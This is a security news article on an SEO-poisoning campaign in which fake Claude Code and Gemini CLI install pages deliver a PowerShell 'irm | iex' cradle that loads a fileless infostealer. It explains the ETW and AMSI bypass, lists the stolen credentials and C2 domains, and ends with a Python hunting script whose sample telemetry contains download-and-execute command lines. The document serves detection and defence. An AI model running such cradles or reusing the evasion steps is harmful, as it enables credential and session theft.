Developers searching Google for Anthropic’s Claude Code or Google’s Gemini CLI are being routed to convincing fake installation pages that hand them a single PowerShell command to paste into a terminal. Run it and a fileless infostealer loads straight into memory, scrapes credentials, session tokens and VPN keys and ships them to an attacker. The genuine tool installs at the same time, so nothing on screen looks wrong.
The campaign was first flagged on 21 April 2026 by an independent researcher who posts as @g0njxa on X. Security firm EclecticIQ published a full analysis on 21 May, tracing the operation to a single, financially motivated actor that began registering malicious domains in early March. The Claude Code lookalikes, claudecode[.]co[.]com and claude-setup[.]com, went up on 30 March.
There is no CVE here and nothing to patch. The weakness being exploited is a habit: copying a command off a web page and running it because the page looks like the real documentation.
The Trick Is the Parallel Install
The fake pages do not offer a download. They tell the developer to paste one line into the terminal, an irm | iex cradle that pipes Invoke-RestMethod into Invoke-Expression. EclecticIQ found the script runs two things at once. A hidden Shell.Application COM object quietly fetches the second-stage stealer from a setup domain such as gemini-setup[.]com and executes it in memory while the same script runs the real npm install -g @google/gemini-cli alongside it.
The legitimate package finishes installing in the terminal. The developer sees a working tool and moves on. By that point the stealer has already collected and exfiltrated the data.
Built to Run Without a Trace
The payload never touches disk. It patches the PSEtwLogProvider.m_enabled flag to silence PowerShell’s Event Tracing for Windows and disables the Antimalware Scan Interface, so it runs without tripping signature or heuristic detection. It loads C# types at runtime to sidestep monitored cmdlets, reads Windows Credential Manager and enumerates running processes to map the machine.
What it takes is broad: OAuth tokens, CI/CD credentials, corporate VPN configuration, browser cookies, DPAPI-protected secrets, and session cookies for Slack, Microsoft Teams, Discord and Telegram. It also pulls cryptocurrency wallet data and files from cloud-sync folders including Proton Drive, iCloud Drive, Google Drive, MEGA and OneDrive, then sends everything encrypted to command-and-control servers at events[.]msft23[.]com and events[.]ms709[.]com.
A stolen session cookie is the dangerous part. It lets an attacker open a victim’s workspace with no password and no MFA prompt.
Who Is Being Hit and Who the Vendor Thinks Is
EclecticIQ assesses the campaign is aimed at developers in the US and UK, based on the actor’s use of .co.uk, .us.com and .us.org domains. That is a fair reading of the infrastructure, but it is an inference from domain naming, not confirmed victimology. The same report lists confirmed intrusions across government, electronics, education and food and beverage organizations spanning the Americas, Asia-Pacific, Europe and the Middle East, which puts the real footprint wider than the domain choices imply.
A second, overlapping operation that EclecticIQ tracks as InstallFix used paid Google Ads to push near-identical fake Claude Code pages to the top of search results. Same lure, different delivery. One buys the ranking, the other games it.
Developers are the point. They hold elevated privileges, access to source repositories and keys into the software supply chain so one compromised workstation can open far more than one machine.
There Is Nothing to Patch, So Change the Habit
Install from the vendor’s own domain, not the first search result and not a sponsored ad. Bookmark the official Claude Code and Gemini CLI documentation and use it. Treat any page that asks you to paste a PowerShell command into your terminal as hostile until you have confirmed the domain yourself.
For detection, hunt command-line telemetry for the irm | iex cradle. Invoke-RestMethod and Invoke-Expression chained together, or their aliases, are a high-fidelity signal, according to EclecticIQ. Block and alert on the known C2 domains.
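A hunt over process-creation telemetry for that cradle, as an added example that is not from the EclecticIQ report or either vendor. It assumes the input is the CommandLine field of Windows process-creation events (Sysmon Event ID 1 or Security 4688) and uses constructed sample lines; it covers the cmdlet names, their built-in aliases, and both the piped and the nested form.

```python
import re
from typing import Optional

# Download cmdlets and their built-in PowerShell aliases, and the execution cmdlet and its alias.
DOWNLOAD = r"(?:invoke-restmethod|irm|invoke-webrequest|iwr)"
EXECUTE = r"(?:invoke-expression|iex)"

# Shape 1: "irm <url> | iex" (anything may sit between the download and the final pipe).
PIPED = re.compile(rf"\b{DOWNLOAD}\b.*\|\s*{EXECUTE}\b", re.IGNORECASE)
# Shape 2: "iex (irm <url>)" or "iex (& irm <url>)".
NESTED = re.compile(rf"\b{EXECUTE}\b\s*\(?\s*(?:&\s*)?{DOWNLOAD}\b", re.IGNORECASE)


def classify(cmdline: str) -> Optional[str]:
    """Return the cradle shape found in one command line, or None if it is clean.
    Encoded commands (-EncodedCommand) must be base64-decoded before being passed in."""
    if PIPED.search(cmdline):
        return "piped_cradle"
    if NESTED.search(cmdline):
        return "nested_cradle"
    return None


def hunt(lines):
    """Return (index, verdict, cmdline) for every telemetry line that contains a cradle."""
    hits = []
    for i, line in enumerate(lines):
        verdict = classify(line)
        if verdict:
            hits.append((i, verdict, line))
    return hits


# Constructed sample telemetry (not real events); URLs use the reserved .invalid TLD.
SAMPLE_TELEMETRY = [
    'powershell.exe -NoProfile -Command "irm https://example.invalid/setup.ps1 | iex"',
    'powershell -ep bypass -c "Invoke-RestMethod https://example.invalid/s | Invoke-Expression"',
    'pwsh -c "iex (iwr https://example.invalid/install.ps1).Content"',
    'powershell -c "npm install -g @google/gemini-cli"',
    'powershell -c "Invoke-RestMethod https://api.example.invalid/status | ConvertTo-Json"',
]

if __name__ == "__main__":
    for i, verdict, line in hunt(SAMPLE_TELEMETRY):
        print(f"[{verdict}] line {i}: {line}")
```

The last two sample lines are the legitimate install and an ordinary REST call piped somewhere other than Invoke-Expression; neither is flagged, which is the point of keying on the chain rather than on Invoke-RestMethod alone.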
If a developer machine ran one of these commands, a password reset is not enough. A stolen session cookie stays valid until the session is killed, so revoke the OAuth tokens, rotate the CI/CD and VPN credentials and terminate the active sessions.
References
- SEO Poisoning Campaign Leverages Gemini and Claude Code Impersonation to Deliver Infostealer
- Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
- SEO Poisoning Uses Fake AI Installers to Drop Infostealers
- Claude Fraud: When Trusted Tools Become the Attack Surface